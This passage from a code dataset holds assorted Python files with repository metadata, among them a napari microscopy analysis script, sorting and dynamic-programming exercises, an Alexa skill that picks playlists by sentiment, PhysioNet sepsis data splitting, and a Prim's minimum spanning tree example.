plugin=\"tifffile\")\n\nn_nuclear_convex_dilation = 12\nlocal_size = 200\nrmax = 100\nmax_area = 60000\nmin_circ = 0.8\n\n\ndef img_to_pixel_int(mask: np.array, img: np.array):\n index = [i for i, e in enumerate(mask.flatten()) if e != 0]\n out = list(map(img.flatten().__getitem__, index))\n return out\n\npos_bg = []\nneg_bg = []\n\nfor f in range(img_hoechst_stack.shape[0]):\n fov = start_fov+f\n print(\"Analyzing %s, fov %s\" % (sample1, fov))\n img_nuclear_bgc = img_hoechst_stack[fov, :, :]\n img_mCherry_bgc = img_mCherry_stack[fov, :, :]\n img_DNAFISH_bgc = img_DNAFISH_stack[fov, :, :]\n img_seg = skio.imread(\"%s%s/seg_tif/%s/%s_%s_seg.tif\" % (data_dir2, sample1, batch, sample1, fov), plugin=\"tifffile\")\n\n if n_nuclear_convex_dilation > 0:\n img_nuclear_seg = dilation(img_seg, disk(n_nuclear_convex_dilation))\n\n # measure\n # get local images\n mCherry_props = regionprops(img_seg, img_mCherry_bgc)\n for i in range(min(len(mCherry_props), 5)):\n if (mCherry_props[i].area < max_area) & (\n (4 * math.pi * mCherry_props[i].area) / (mCherry_props[i].perimeter ** 2) > min_circ):\n\n print(\"Analyzing %s, fov %s, nuclear %s/%s\" % (sample1, fov, i + 1, len(mCherry_props)))\n original_centroid_nuclear = mCherry_props[i].centroid\n position = ima.img_local_position(img_nuclear_seg, original_centroid_nuclear, local_size)\n local_nuclear_seg = ima.img_local_seg(img_nuclear_seg, position, mCherry_props[i].label)\n local_nuclear = img_nuclear_bgc.copy()\n local_nuclear = local_nuclear[position[0]:position[1], position[2]:position[3]]\n local_DNAFISH = img_DNAFISH_bgc.copy()\n local_DNAFISH = local_DNAFISH[position[0]:position[1], position[2]:position[3]]\n local_DNAFISH[local_nuclear_seg == 0] = 0\n\n viewer = napari.Viewer()\n viewer.add_image(local_DNAFISH, blending='additive', colormap='green', contrast_limits=[0, local_DNAFISH.max()])\n shapes = viewer.add_shapes(name='Shapes', ndim=2)\n napari.run()\n\n poly_data = shapes.data[0]\n shapes_layer = viewer.layers['Shapes']\n top, left = 
np.floor(np.min(poly_data, axis=0))\n                bottom, right = np.ceil(np.max(poly_data, axis=0))\n                top, bottom = np.clip((top, bottom), 0, local_DNAFISH.shape[0] - 1).astype(int)\n                left, right = np.clip((left, right), 0, local_DNAFISH.shape[1] - 1).astype(int)\n                output_shape = (bottom - top + 1, right - left + 1)\n                # generate sub_masks and sub_channels\n                sub_masks = shapes_layer._data_view.to_masks(mask_shape=output_shape, offset=(top, left))[0]\n                local_DNAFISH_mask = local_DNAFISH[top:bottom + 1, left:right + 1] * sub_masks\n                bg = regionprops(label(sub_masks), local_DNAFISH_mask)[0].intensity_mean\n\n                if mCherry_props[i].intensity_mean > pos_threshold:\n                    pos_bg.append(bg)\n                    print('pos: %s' % len(pos_bg))\n                elif mCherry_props[i].intensity_mean < neg_threshold:\n                    neg_bg.append(bg)\n                    print('neg: %s' % len(neg_bg))\n\n    background = pd.DataFrame()\n    background['sample'] = [sample1_pos] * len(pos_bg) + [sample1_neg] * len(neg_bg)\n    background['bg'] = pos_bg + neg_bg\n    if batch > 0:\n        background.to_csv('%s%s_%s_background.txt' % (output_dir, sample1, batch), index=False, sep='\\t')\n    else:\n        background.to_csv('%s%s_background.txt' % (output_dir, sample1), index=False, sep='\\t')\n\n\nprint(\"DONE!\")","repo_name":"xwyan1230/ecDNA_napari-env","sub_path":"analysis/20_20230216_mixing_BRD4-series/23_20230222_background_measurement.py","file_name":"23_20230222_background_measurement.py","file_ext":"py","file_size_in_byte":5014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"36217793414","text":"# Module-level functions so the recursive calls resolve correctly\n# (inside a class body, quickSort/partition are not visible to each other at call time).\ndef partition(array, start, end):\n    # Lomuto partition: pivot on the last element of the current slice.\n    pivot = array[end]\n    i = start - 1\n    for j in range(start, end):\n        if array[j] < pivot:\n            i += 1\n            array[i], array[j] = array[j], array[i]\n    i += 1\n    array[i], array[end] = array[end], array[i]\n    return i\n\n\ndef quickSort(array, start, end):\n    if end <= start:\n        return\n    pivot = partition(array, start, end)\n    quickSort(array, start, pivot - 1)\n    quickSort(array, pivot + 1, end)\n\n\narray = [8, 7, 9, 2, 3, 1, 5, 4, 6]\n\nquickSort(array, 0, len(array) - 1)\n\noutput = \"\"\nfor num in array:\n    output += f'{num} '\nprint(output)","repo_name":"hyeokjinjin/DSA-Practice","sub_path":"Sort/QuickSort.py","file_name":"QuickSort.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"18761312796","text":"import csv\n\nfrom cs50 import SQL\n\ndb = SQL(\"sqlite:///favorites.db\")\n\ntitle = input(\"Title: \").strip()\n\n# this db.execute returns us a list\nrows = db.execute(\"SELECT title FROM fav WHERE title LIKE ?\", title) # ? 
in SQL is like %s in C\n\nfor row in rows:\n print(row[\"title\"])","repo_name":"imxkamil/cs50","sub_path":"projects/pset7/crud/fav2.py","file_name":"fav2.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"21254081922","text":"# Escrever arquivo em Python.\nelemento = int(input('\\nInforme o número de elementos para o arquivo: '))\nprint()\ndado = [input(\"Dado: \") for i in range(elemento)]\nprint(f'\\n\\033[0;32m{dado}\\033[m foi adicionado ao arquivo data_base.')\nprint('\\n\\033[0;36mOs dados informados foram salvos no arquivo data_base.txt!\\033[m\\n')\nwith open('data_base.txt', 'a') as arquivo:\n for dados in dado:\n arquivo.write(dados + '\\n')\n\n'''\nwith open('data_base_01.txt', 'w') as arquivo:\n arquivo.write(str(dado))\n\n# Excluir arquivo em Python.\nimport os\nif os.path.exists('data_base.txt'):\n os.remove('data_base.txt')\nelse:\n print('\\nO arquivo informado não existe!\\n')\n'''","repo_name":"jonathansilveira1987/MACETES","sub_path":"PYTHON/escrever_arquivo_e_salvar.py","file_name":"escrever_arquivo_e_salvar.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20965248704","text":"import argparse\nimport logging\n\n__logger = logging.getLogger(__name__)\n\n\ndef read_args() -> argparse.ArgumentParser:\n \"\"\"\n function defines input arguments\n :return: input arguments\n \"\"\"\n parser = argparse.ArgumentParser(description=\"AI style transfer allows to transform \"\n \"input image(s) into output image(s) by using style image(s) \"\n \"as a pattern.\",\n epilog=\"The End!\")\n\n parser.add_argument('-m', '--mode', type=str,\n choices=[\"dir\", \"file\", \"url\"], required=True,\n help='If \"dir\" mode, program uses input dir and style dir.\\n'\n 'If \"file\" mode, you can specify files instead of directories.\\n'\n 'If \"url\" mode, you can specify urls for input and style images.')\n parser.add_argument('-i', '--input', default=\"images/input\", type=str,\n help='For \"mode\" eq \"dir\" it is an input images dir.\\n'\n 'For \"mode\" eq \"file\" it is a path to input image.\\n'\n 'For \"mode\" eq \"url\" it is a url to input image.')\n parser.add_argument('-e', '--epochs', default=5, type=int,\n help='Number of epochs')\n parser.add_argument('-s', '--style', default=\"images/styles\", type=str,\n help='For \"mode\" eq \"dir\" it is style images dir.\\n'\n 'For \"mode\" eq \"file\" it is a path to style image.\\n'\n 'For \"mode\" eq \"url\" it is a url to style image.')\n parser.add_argument('-o', '--output-dir', default=\"images/output\", type=str,\n help='Output dir. Default value: \"images/output\"')\n parser.add_argument('-w', '--width', default=800, type=int,\n help='Output image width. 
Height will be calculated based on this value')\n parser.add_argument('-f', '--max-fun', default=30, type=int,\n help='Maximum number of function evaluations for optimizer')\n parser.add_argument('--input-weight', default=0.1, type=float,\n help='Input image weight')\n parser.add_argument('--style-weight', default=0.9, type=float,\n help='Style image weight')\n parser.add_argument('--variation-weight', default=1e-4, type=float,\n help='Variation weight')\n parser.add_argument('-v', '--verbose', action='count',\n help='Use flag for more detailed logs')\n\n if parser.parse_args().verbose:\n __logger.info(\"Input arguments: {}\".format(parser.parse_args()))\n return parser\n","repo_name":"robertobloj/ai-style-transfer","sub_path":"utils/args_utils.py","file_name":"args_utils.py","file_ext":"py","file_size_in_byte":2744,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"24011614367","text":"import statistics\nimport math\n\nfilename = \"/home/wonziu/Documents/adventofcode/Day_7/input.txt\"\n\ndef first(data):\n align = round(statistics.median(data))\n return sum(abs(align - x) for x in data)\n\ndef triangular_distance(x, y):\n return int(abs(x - y) * (1 + abs(x - y)) / 2)\n\ndef second(data):\n align = statistics.mean(data)\n lower = int(math.floor(align))\n upper = int(math.ceil(align))\n return min(sum(triangular_distance(lower, x) for x in data), sum(triangular_distance(upper, x) for x in data))\n\nif __name__ == '__main__':\n with open(filename) as file:\n data = list(map(int, file.read().rstrip().split(',')))\n print(first(data))\n print(second(data))\n","repo_name":"mleonowicz/aoc-2021","sub_path":"Day_7/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19532514201","text":"#difference\nfriends = {\"Bob\", \"Anne\", \"Rolf\"}\nabroad = {\"Bob\", \"Anne\"}\n\nlocal_friends = friends.difference(abroad)\nprint(local_friends)\n\n#union\ntwo_fruits = {\"Orange\", \"Tangerine\"}\none_fruit = {\"Apple\"}\nshake = two_fruits.union(one_fruit)\nprint(shake)\n\n#intersection\nart = {\"Bob\", \"Jen\", \"Rolf\", \"Charlie\"}\nscience = {\"Bob\", \"Jen\", \"Adam\", \"Anne\"}\nboth = art.intersection(science)\nprint(both)","repo_name":"Vincetroid/learning-python","sub_path":"rest_apis_with_flask_and_python/advanced-set-operations.py","file_name":"advanced-set-operations.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"2652656754","text":"import numpy as np\nfrom os import listdir\nfrom iterative_interpolation import *\n\n# path = \"D:\\Physionet Challenge\\old_data\\\\\"\npath = r\"D:\\Physionet Challenge\\GitHub\\pnet2019\\training\\\\\"\n\n\ndef replace_nan(data, patients_id, value=None):\n new_dataset = []\n for id in np.unique(patients_id):\n print(id)\n features_ = data[np.where(patients_id == id)[0]]\n patient = []\n for h in range(len(features_)):\n features = features_[:h+1]\n aux = []\n for feature in features.T:\n mean = np.nanmean(feature)\n std = np.nanstd(feature)\n if ~np.isnan(feature).all():\n if value == 'mean':\n aux.append(np.nan_to_num(feature, nan=mean)[-1])\n elif value == 'normal':\n for j, measure in enumerate(feature):\n if np.isnan(measure):\n feature[j] = np.random.normal(mean, std)\n aux.append(feature[-1])\n elif value == 'interpolation':\n nan_bounds(feature)\n 
nan_interpolate(feature)\n aux.append(feature[-1])\n else:\n aux.append(np.nan_to_num(feature)[-1])\n else:\n aux.append(np.zeros(np.shape(feature))[-1])\n # print(np.shape(aux))\n patient.append(aux)\n new_dataset.append(np.vstack(patient))\n print(np.shape(new_dataset))\n return np.vstack(new_dataset)\n\n\n# data = np.load(\"./Datasets/training_AB.npy\")\n# patients_id = np.load(\"./Datasets/training_AB_patient.npy\")\n#\n# # dataset = replace_nan(data, patients_id, 'mean')\n# # np.save(\"training_AB_mean_causal\", dataset)\n# #\n# # dataset_2 = replace_nan(data, patients_id, 'normal')\n# # np.save(\"training_AB_normal_causal\", dataset_2)\n#\n# dataset = replace_nan(data, patients_id, 'interpolation')\n# np.save(\"training_AB_interp_causal\", dataset)\n\n\ndef generate_new_dataset(path, name='new_dataset_AB.npy'):\n '''\n This function generates a npy file with the data present in the files in path.\n The generated npy are (in terms of columns): features, label of sample, label of patient, patient ID.\n \n :params:\n path: (str)\n path to the folder containing the psv files.\n name: (str)\n name of the generated npy file.\n '''\n dataset = np.zeros(shape=(1, 43))\n for i, file in enumerate(listdir(path)):\n print(i)\n if '.psv' in file: #'p1' in file:\n with open(path+file, 'r') as f:\n header = f.readline().strip()\n column_names = header.split('|')\n data = np.loadtxt(f, delimiter='|')\n if 1 in data[:, -1]:\n num = np.ones\n else:\n num = np.zeros\n data = np.hstack([data, num(shape=(data.shape[0], 1))])\n id = int(file.strip('p.psv'))\n id_set = np.array([id]*data.shape[0]).reshape(-1, 1)\n data = np.hstack([data, id_set])\n dataset = np.vstack([dataset, data])\n print(dataset.shape)\n np.save(name, dataset[1:])\n\n\ndef GroupStratifiedKFold(dataset, n_split=10):\n '''\n Split the data in Stratified K folds considering the groups.\n Namely, the same group can not appear in the training and testing set at the same time (iteration).\n Note: This function only works with binary tasks.\n\n :params:\n dataset: (numpy.array)\n The dataset to split in train and test sets. 
It is expected to have the format of: features,\n labels per sample, labels per patient, patient ID.\n n_split: (int)\n The number of folds to use in cross validation.\n\n :returns:\n train_indexes: (numpy.array)\n Indexes of the trainning samples in order.\n It should be iterated such as: X_train, y_train = X[train_indexes[i]], y[train_indexes[i]]\n test_indexes: (numpy.array)\n Indexes of the trainning samples in order.\n It should be iterated such as: X_test, y_test = X[test_indexes[i]], y[test_indexes[i]]\n\n Note that the iteration of train_indexes[i] and test_indexes[i] should always be the same!\n\n :Example:\n\n ...\n\n train_index, test_index = GroupStratifiedKFold(np.hstack([features, labels.reshape(-1,1), labels_patient, patient_id]), 10)\n\n for j in range(len(train_index)):\n print(\"TRAIN:\", train_index[j], \"TEST:\", test_index[j])\n X_train, X_test = X[train_index[j]], X[test_index[j]]\n y_train, y_test = y[train_index[j]], y[test_index[j]]\n\n ...\n '''\n old_id = 0\n patient = []\n patients_healthy_ind = []\n patients_sepsis_ind = []\n aux_ind = []\n for i, sample in enumerate(dataset):\n if sample[-1] == old_id:\n patient.append(sample[-2])\n aux_ind.append(i)\n else:\n old_id = sample[-1]\n if 1 in np.array(patient):\n patients_sepsis_ind.append(np.array(aux_ind, dtype=int))\n else:\n patients_healthy_ind.append(np.array(aux_ind, dtype=int))\n patient = [sample[-2]]\n aux_ind = [i]\n if 1 in np.array(patient):\n patients_sepsis_ind.append(np.array(aux_ind, dtype=int))\n else:\n patients_healthy_ind.append(np.array(aux_ind, dtype=int))\n\n patients_healthy = np.array(patients_healthy_ind)\n patients_sepsis = np.array(patients_sepsis_ind)\n\n print(patients_healthy.shape)\n print(patients_sepsis.shape)\n\n len_sepsis = len(patients_sepsis)\n len_healthy = len(patients_healthy)\n\n sepsis_nbr = int(len_sepsis // n_split)\n healthy_nbr = int(len_healthy // n_split)\n\n test_sepsis = []\n test_healthy = []\n train_sepsis = []\n train_healthy = []\n\n ind = 0\n while ind in range(n_split):\n first_in_sepsis = ind*sepsis_nbr\n second_in_sepsis = first_in_sepsis + sepsis_nbr\n\n print(\"Sepsis: \", first_in_sepsis, second_in_sepsis)\n\n first_in_healthy = ind * healthy_nbr\n second_in_healthy = first_in_healthy + healthy_nbr\n\n print(\"Normal: \", first_in_healthy, second_in_healthy)\n\n test_sepsis.append(np.concatenate(patients_sepsis[range(first_in_sepsis, second_in_sepsis)]))\n train_sepsis.append(np.concatenate(patients_sepsis[\n np.concatenate([range(first_in_sepsis), range(second_in_sepsis, len_sepsis)]).astype(int)]))\n test_healthy.append(np.concatenate(patients_healthy[range(first_in_healthy, second_in_healthy)]))\n train_healthy.append(np.concatenate(patients_healthy[\n np.concatenate([range(first_in_healthy),range(second_in_healthy, len_healthy)]).astype(int)]))\n ind += 1\n\n return np.array([np.concatenate([train_healthy[j], train_sepsis[j]]) for j in range(n_split)]),\\\n np.array([np.concatenate([test_healthy[i], test_sepsis[i]]) for i in range(n_split)])\n\n\n# generate_new_dataset(path, 'new_dataset_AB.npy')\n# dataset = np.load('D:\\Physionet Challenge\\GitHub\\pnet2019\\Rui\\Datasets\\dataset_A_mean_subs.npy')\n# train_indexes, test_indexes = GroupStratifiedKFold(dataset, 10)\n\n","repo_name":"malfarasplux/pnet2019","sub_path":"Rui/GroupStratifiedKFold.py","file_name":"GroupStratifiedKFold.py","file_ext":"py","file_size_in_byte":7290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} 
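The PhysioNet record above depends on `nan_bounds` and `nan_interpolate` from an `iterative_interpolation` module that is not included in the dataset. A rough NumPy sketch of plausible stand-ins — the real helpers may behave differently:

```python
import numpy as np

def nan_bounds(x):
    # Hypothetical stand-in: extend the first/last observed values over
    # leading and trailing NaNs, in place.
    idx = np.flatnonzero(~np.isnan(x))
    if idx.size:
        x[: idx[0]] = x[idx[0]]
        x[idx[-1] + 1:] = x[idx[-1]]

def nan_interpolate(x):
    # Hypothetical stand-in: linearly interpolate interior NaNs, in place.
    nans = np.isnan(x)
    x[nans] = np.interp(np.flatnonzero(nans), np.flatnonzero(~nans), x[~nans])

v = np.array([np.nan, 1.0, np.nan, 3.0, np.nan])
nan_bounds(v)
nan_interpolate(v)
print(v)  # [1. 1. 2. 3. 3.]
```

This matches how the record uses the helpers: bound-fill first so the series has defined endpoints, then interpolate, then take the latest causal value with `feature[-1]`.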
+{"seq_id":"35918555202","text":"'''\n\t@judge ZeroJudge\n\t@id d283\n\t@name 大數加法\n\n\t@tag Big Number, Fibonacci Number\n'''\nfrom sys import stdin\n\nfib = [0, 1]\nfor n in range(2, 20001):\n\tfib.append(fib[n - 1] + fib[n - 2])\n\nfor line in stdin:\n\tprint(fib[int(line)])","repo_name":"m80126colin/Judge","sub_path":"since2020/ZeroJudge/ZeroJudge d283.py","file_name":"ZeroJudge d283.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"75"} +{"seq_id":"22299176584","text":"#!/usr/bin/env python3\nimport sys\nsys.setrecursionlimit(15000)\nn = int(sys.stdin.readline())\n\ndef lcs(X,Y):\n n_y = len(Y)\n n_x = len(X)\n #dp = [[0]*(n_x+1) for _ in range(n_y+1)]\n dp = [0]*(n_x+1)\n for i_y in range(n_y):\n ndp = dp.copy()\n for i_x in range(n_x):\n if X[i_x] == Y[i_y]:\n #dp[i_y+1][i_x+1] = dp[i_y][i_x] + 1\n ndp[i_x+1] = dp[i_x] + 1\n elif dp[i_x+1] < ndp[i_x]:\n #dp[i_y+1][i_x+1] = max(dp[i_y+1][i_x],dp[i_y][i_x+1])\n ndp[i_x+1] = ndp[i_x]\n dp = ndp\n #print(dp)\n #return(dp[-1][-1])\n return(dp[-1])\n\nret = []\ninp = sys.stdin.readlines()\nfor i in range(n):\n X = inp[2*i].rstrip()#[:-1]#input()\n Y = inp[2*i+1].rstrip()#[:-1]#input()\n ret.append(lcs(X,Y))\n #print\n\nprint(*ret,sep=\"\\n\")\n","repo_name":"uk-ar/competitive_programming","sub_path":"aoj/alds1_10_c.py","file_name":"alds1_10_c.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31965204772","text":"\"\"\"\nThis sample demonstrates a simple skill built with the Amazon Alexa Skills Kit.\nThe Intent Schema, Custom Slots, and Sample Utterances for this skill, as well\nas testing instructions are located at http://amzn.to/1LzFrj6\n\nFor additional samples, visit the Alexa Skills Kit Getting Started guide at\nhttp://amzn.to/1LGWsLG\n\"\"\"\n\nfrom __future__ import print_function\nfrom watsonAlchemy import getSentiment\nfrom findPlaylist import findPlaylist\nimport requests\nimport json\n\n\n# --------------- Helpers that build all of the responses ----------------------\n\ndef build_speechlet_response(title, output, reprompt_text, should_end_session):\n return {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': output\n },\n 'card': {\n 'type': 'Simple',\n 'title': \"SessionSpeechlet - \" + title,\n 'content': \"SessionSpeechlet - \" + output\n },\n 'reprompt': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': reprompt_text\n }\n },\n 'shouldEndSession': should_end_session\n }\n\n\ndef build_response(session_attributes, speechlet_response):\n return {\n 'version': '1.0',\n 'sessionAttributes': session_attributes,\n 'response': speechlet_response\n }\n\n\n# --------------- Functions that control the skill's behavior ------------------\n\ndef get_welcome_response():\n \"\"\" If we wanted to initialize the session to have some attributes we could\n add those here\n \"\"\"\n\n session_attributes = {}\n card_title = \"Welcome\"\n speech_output = \"Welcome to the All The Feels Poly Hacks 2017 Project. \" \\\n \"Please tell me how your day was \"\n # If the user either does not reply to the welcome message or says something\n # that is not understood, they will be prompted again with this text.\n reprompt_text = \"I didn't catch that. 
\" \\\n \"Please tell me how your day was by saying something like \" \\\n \"My day was pretty good, thank you.\"\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef handle_session_end_request():\n card_title = \"Session Ended\"\n speech_output = \"Thank you for trying the All The Feels Poly Hacks 2017 Project. \" \\\n \"Have a nice day! \"\n # Setting this to true ends the session and exits the skill.\n should_end_session = True\n return build_response({}, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n\n\ndef convert_feelings_to_rating(feeling):\n ratingJSON = getSentiment(feeling)\n return ratingJSON['score']\n\ndef set_mood_in_session(intent, session):\n card_title = intent['name']\n session_attributes = {}\n should_end_session = False\n\n if 'Feeling' in intent['slots']:\n feeling = intent['slots']['Feeling']['value']\n score = convert_feelings_to_rating(feeling)\n session_attributes['userResponse'] = feeling\n session_attributes['score'] = score\n session_attributes['playlists'] = findPlaylist(float(score))\n session_attributes['index'] = 0\n currentPlaylist = session_attributes['playlists'][session_attributes['index']]['name']\n score = float(score)\n if score < -0.8:\n speech_output = \"I'm sorry to hear that. I've curated some playlists based on your current mood. Would you like to listen to \" + currentPlaylist\n elif score < -0.5:\n speech_output = \"I'm sure your day will get better. I've curated some playlists based on your current mood. Would you like to listen to \" + currentPlaylist\n elif score < 0:\n speech_output = \"I feel you. I've curated some playlists based on your current mood. Would you like to listen to \" + currentPlaylist\n elif score < 0.5:\n speech_output = \"I'm glad to hear that. I've curated some playlists based on your current mood. Would you like to listen to \" + currentPlaylist\n else:\n speech_output = \"That's so lit. I've curated some playlists based on your current mood. Would you like to listen to \" + currentPlaylist\n reprompt_text = \". Sorry, I didn't catch that. Would you like to listen to \" + \\\n currentPlaylist\n else:\n speech_output = \"I'm not sure how you're feeling. \" \\\n \"Please tell me how your day has been.\"\n reprompt_text = \"I'm not sure how you're feeling. \" \\\n \"Please tell me how your day has been.\"\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\ndef cheerUp(intent, session):\n card_title = intent['name']\n session_attributes = {}\n should_end_session = False\n\n if \"playlists\" in session.get('attributes', {}):\n score = 1\n session_attributes['score'] = score\n session['attributes']['playlists'] = findPlaylist(score)\n session['attributes']['index'] = 0\n currentPlaylist = session['attributes']['playlists'][session['attributes']['index']]['name']\n speech_output = \"I'll make you feel better. Would you like to listen to \" + \\\n currentPlaylist\n reprompt_text = \". Sorry, I didn't catch that. Would you like to listen to \" + \\\n currentPlaylist\n else:\n speech_output = \"I'm not sure how you're feeling. \" \\\n \"Please tell me how your day has been.\"\n reprompt_text = \"I'm not sure how you're feeling. 
\" \\\n \"Please tell me how your day has been.\"\n return build_response(session['attributes'], build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\ndef get_playlists_from_session_yes(intent, session):\n session_attributes = {}\n reprompt_text = None\n request = requests.Session()\n\n if \"playlists\" in session.get('attributes', {}):\n playlists = session['attributes']['playlists']\n index = session['attributes']['index']\n currentPlaylist = playlists[index]['name']\n currentURI = playlists[index]['URI']\n url = 'http://6da862e2.ngrok.io/AllTheFeels/webresources/allthefeels/spotify/'\n request.get(url+str(currentURI))\n session['attributes']['index'] = index + 1\n speech_output = \"Say no more, Now Playing \" + currentPlaylist\n should_end_session = True\n else:\n speech_output = \"I'm not sure what your favorite color is. \" \\\n \"You can say, my favorite color is red.\"\n should_end_session = False\n\n # Setting reprompt_text to None signifies that we do not want to reprompt\n # the user. If the user does not respond or says something that is not\n # understood, the session will end.\n return build_response(session['attributes'], build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n\ndef get_playlists_from_session_no(intent, session):\n session_attributes = {}\n\n if \"playlists\" in session.get('attributes', {}):\n playlists = session['attributes']['playlists']\n index = session['attributes']['index']\n session['attributes']['index'] = index + 1\n currentPlaylist = playlists[index+1]['name']\n\n if index < len(playlists):\n speech_output = \"Alright, would you like to listen to \" + currentPlaylist + \\\n \" instead.\"\n reprompt_text = \"Sorry, I didn't catch that. Would you like to listen to \" + currentPlaylist + \\\n \" instead. \"\n should_end_session = False\n else:\n speech_output = \"Okay, sorry you didn't like that, but we are all out of options.\"\n reprompt_text = None\n should_end_session = True\n else:\n speech_output = \"I'm not sure what your favorite color is. \" \\\n \"You can say, my favorite color is red.\"\n reprompt_text = None\n should_end_session = False\n\n # Setting reprompt_text to None signifies that we do not want to reprompt\n # the user. 
If the user does not respond or says something that is not\n # understood, the session will end.\n return build_response(session['attributes'], build_speechlet_response(\n intent['name'], speech_output, reprompt_text, should_end_session))\n\n\n# --------------- Events ------------------\n\ndef on_session_started(session_started_request, session):\n \"\"\" Called when the session starts \"\"\"\n\n print(\"on_session_started requestId=\" + session_started_request['requestId']\n + \", sessionId=\" + session['sessionId'])\n\n\ndef on_launch(launch_request, session):\n \"\"\" Called when the user launches the skill without specifying what they\n want\n \"\"\"\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()\n\n\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"ScanFeels\":\n return set_mood_in_session(intent, session)\n elif intent_name == \"AMAZON.YesIntent\":\n return get_playlists_from_session_yes(intent,session)\n elif intent_name == \"AMAZON.NoIntent\":\n return get_playlists_from_session_no(intent,session)\n elif intent_name == \"CheerUp\":\n return cheerUp(intent, session)\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent\")\n\n\ndef on_session_ended(session_ended_request, session):\n \"\"\" Called when the user ends the session.\n\n Is not called when the skill returns should_end_session=true\n \"\"\"\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here\n\n\n# --------------- Main handler ------------------\n\ndef lambda_handler(event, context):\n \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) 
The JSON body of the request is provided in the event parameter.\n \"\"\"\n print(\"event.session.application.applicationId=\" +\n event['session']['application']['applicationId'])\n\n \"\"\"\n Uncomment this if statement and populate with your skill's application ID to\n prevent someone else from configuring a skill that sends requests to this\n function.\n \"\"\"\n # if (event['session']['application']['applicationId'] !=\n # \"amzn1.echo-sdk-ams.app.[unique-value-here]\"):\n # raise ValueError(\"Invalid Application ID\")\n\n if event['session']['new']:\n on_session_started({'requestId': event['request']['requestId']},\n event['session'])\n\n if event['request']['type'] == \"LaunchRequest\":\n return on_launch(event['request'], event['session'])\n elif event['request']['type'] == \"IntentRequest\":\n return on_intent(event['request'], event['session'])\n elif event['request']['type'] == \"SessionEndedRequest\":\n return on_session_ended(event['request'], event['session'])\n","repo_name":"DavidIsrawi/AllTheFeels","sub_path":"lambdaCode/lambda_function.py","file_name":"lambda_function.py","file_ext":"py","file_size_in_byte":11711,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"75"} +{"seq_id":"28971312629","text":"\"\"\"\nHow to build minimum spanning tree with Prim's Algorithm\n\n1) Pick any node as a starting point.\n\n2) Use heapq ot pick smallest edge\n\n\n p0 1 p1\n *------*\n |\\ |\n | \\ 3 | 2\n | \\ |\n 4 | \\ |\n | \\ |\n | \\|\n *------*\n p3 5 p2\n\n minimum is 7 (4 + 1 + 2)\n\n--END--\n\"\"\"\n\nimport collections\nimport heapq\n\n\nclass Node:\n def __init__(self, p, w):\n self.p = p\n self.w = w\n\n def __lt__(self, other):\n return self.w < other.w\n\n\ndef mst(n, edges):\n # init\n cost = 0\n hq = []\n\n # build a graph\n g = collections.defaultdict(dict)\n for p1, p2, w in edges:\n g[p1][p2] = w\n g[p2][p1] = w\n\n # pick random node 0 into heapq\n heapq.heappush(hq, Node(0, 0))\n vst = set()\n\n # pick smallest edge at a time\n while hq:\n node = heapq.heappop(hq)\n\n # node is already visited\n if node.p in vst:\n continue\n\n cost += node.w\n vst.add(node.p)\n\n if len(vst) == n:\n break\n\n for nxt_node, nxt_w in g[node.p].items():\n heapq.heappush(hq, Node(nxt_node, nxt_w))\n\n\n # minimum cost is 7\n assert cost == 7\n\n\nedges = [[0, 1, 1], [1, 2, 2], [2, 3, 5], [3, 0, 4], [0, 2, 3]]\nmst(4, edges)\n","repo_name":"Lancher/coding-challenge","sub_path":"alortihms-before-interview/graph/4_mst/_prime.py","file_name":"_prime.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"27472969252","text":"## compute bc\n# Compute Beltrami coefficients mu of mapping from uv to vertex, where vertex \n# can be 2D or 3D.\n# \n# mu from 2D to 2D is defined by the Beltrami equation:\n# \n# \\[ \\frac{\\partial{f}}{\\partial{\\bar{z}}} = \\mu \\frac{\\partial{f}}{\\partial{z}} \\]\n# \n# mu from 2D to 3D is defined by: 